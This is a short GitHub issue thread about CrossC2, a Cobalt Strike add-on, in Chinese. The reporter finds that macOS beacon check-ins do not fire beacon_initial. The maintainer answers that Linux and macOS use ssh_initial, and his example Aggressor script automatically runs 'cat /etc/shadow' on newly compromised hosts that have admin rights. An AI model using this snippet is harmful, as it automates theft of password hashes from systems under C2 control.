### ISSUE TITLE
[bug] mac 上线不触发 beacon_initial

### ISSUE THREAD

**Issue by orleven** [gloxec/CrossC2#73]
本来弄了个上线提醒的cna脚本的，测试了半天才发现mac 上线不触发 beacon_initial。

https://www.cobaltstrike.com/aggressor-script/beacon.html

**Comment by gloxec** [comment]
Linux & MacOS上线触发应使用 ssh_initial

```
on ssh_initial {
	if (-isadmin $1) {
		bshell($1, "cat /etc/shadow");
	}
}
```

**Comment by orleven** [comment]
ok
